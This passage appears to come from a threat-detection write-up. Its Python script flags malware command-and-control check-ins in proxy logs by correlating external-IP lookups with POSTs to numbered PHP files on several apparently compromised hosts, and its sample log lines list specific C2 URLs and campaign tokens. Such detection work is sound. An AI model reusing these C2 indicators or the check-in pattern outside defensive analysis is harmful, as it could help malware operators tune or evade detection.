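    "2015-10-11T13:55:05\t192.168.1.1\tPOST\thttp://slaughtertime.com/wp-content/themes/blogoma/inc/blogoma-admin/options/validation/str_replace/3.php?k=scbr49gz3uf\t" + UA,
    "2015-10-11T13:55:06\t192.168.1.1\tPOST\thttp://linkcorphk.com/js-js/5.php?w=scbr49gz3uf\t" + UA,
    "2015-10-11T13:55:07\t192.168.1.1\tPOST\thttp://hhydrovac.ca/ap1.php?n=scbr49gz3uf\t" + UA,
    # Controls that must stay quiet: an ordinary WordPress admin POST, and an
    # IP lookup with no follow-on traffic.
    "2015-10-11T13:55:08\t192.168.1.2\tPOST\thttp://example.org/wp-admin/admin-ajax.php?action=heartbeat\tMozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0",
    "2015-10-11T13:55:09\t192.168.1.3\tGET\thttp://myexternalip.com/raw\tcurl/7.35.0",
])

IP_CHECK_HOSTS = {"ip-addr.es", "myexternalip.com", "curlmyip.com"}  # the three in this report
C2_PATH = re.compile(r"/(?:ap)?[1-5]\.php$")      # .../3.php, .../ap5.php
C2_TOKEN = re.compile(r"^[a-z0-9]{11}$")          # scbr49gz3uf, u6da3d26yzj
LEGACY_UA = re.compile(r"MSIE 6\.0; Windows NT 5\.1")
WINDOW = timedelta(minutes=5)   # IP lookup -> C2 POSTs must fall within this
MIN_C2_HOSTS = 3                # distinct compromised hosts before alerting


def parse_line(line):
    ts, client, method, url, ua = line.split("\t", 4)
    return {"ts": datetime.fromisoformat(ts), "client": client,
            "method": method, "url": url, "ua": ua}


def c2_campaign_id(method, url):
    """Return the 11-char token when a request has the shape seen in the report
    (POST to N.php/apN.php with exactly one single-letter query key), else None."""
    parts = urlsplit(url)
    if method != "POST" or not C2_PATH.search(parts.path):
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    if len(params) != 1:
        return None
    key, value = params[0]
    if len(key) == 1 and key.isalpha() and C2_TOKEN.match(value):
        return value
    return None


def correlate(log_text):
    """Per client: IP lookups, C2-shaped POSTs, and whether the sequence
    IP lookup -> POSTs to >= MIN_C2_HOSTS distinct hosts happened within WINDOW."""
    state = defaultdict(lambda: {"ip_checks": [], "first_check": None,
                                 "c2_hosts": set(), "c2_after_check": set(),
                                 "campaign_ids": set(), "legacy_ua": False})
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        s = state[ev["client"]]
        host = urlsplit(ev["url"]).hostname
        s["legacy_ua"] = s["legacy_ua"] or bool(LEGACY_UA.search(ev["ua"]))
        if ev["method"] == "GET" and host in IP_CHECK_HOSTS:
            s["ip_checks"].append(host)
            if s["first_check"] is None:
                s["first_check"] = ev["ts"]
            continue
        token = c2_campaign_id(ev["method"], ev["url"])
        if token:
            s["c2_hosts"].add(host)
            s["campaign_ids"].add(token)
            if s["first_check"] is not None and ev["ts"] - s["first_check"] <= WINDOW:
                s["c2_after_check"].add(host)
    for s in state.values():
        s["alert"] = len(s["c2_after_check"]) >= MIN_C2_HOSTS
    return dict(state)


if __name__ == "__main__":
    for client, s in correlate(LOG).items():
        print(client, "ALERT" if s["alert"] else "ok",
              sorted(s["c2_after_check"]), sorted(s["campaign_ids"]))
```

The URL shape alone is too generic to page on (plenty of legitimate sites serve scripts called 1.php), and an external-IP lookup alone is common for VPN clients and IT tooling; it is the ordered combination from one client, fanned out across many unrelated hosts, that is specific to this family's check-in. The token is worth keeping in the alert because it is constant across every host in a round and changes between rounds, which makes it a useful pivot across proxy logs for the same infection.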
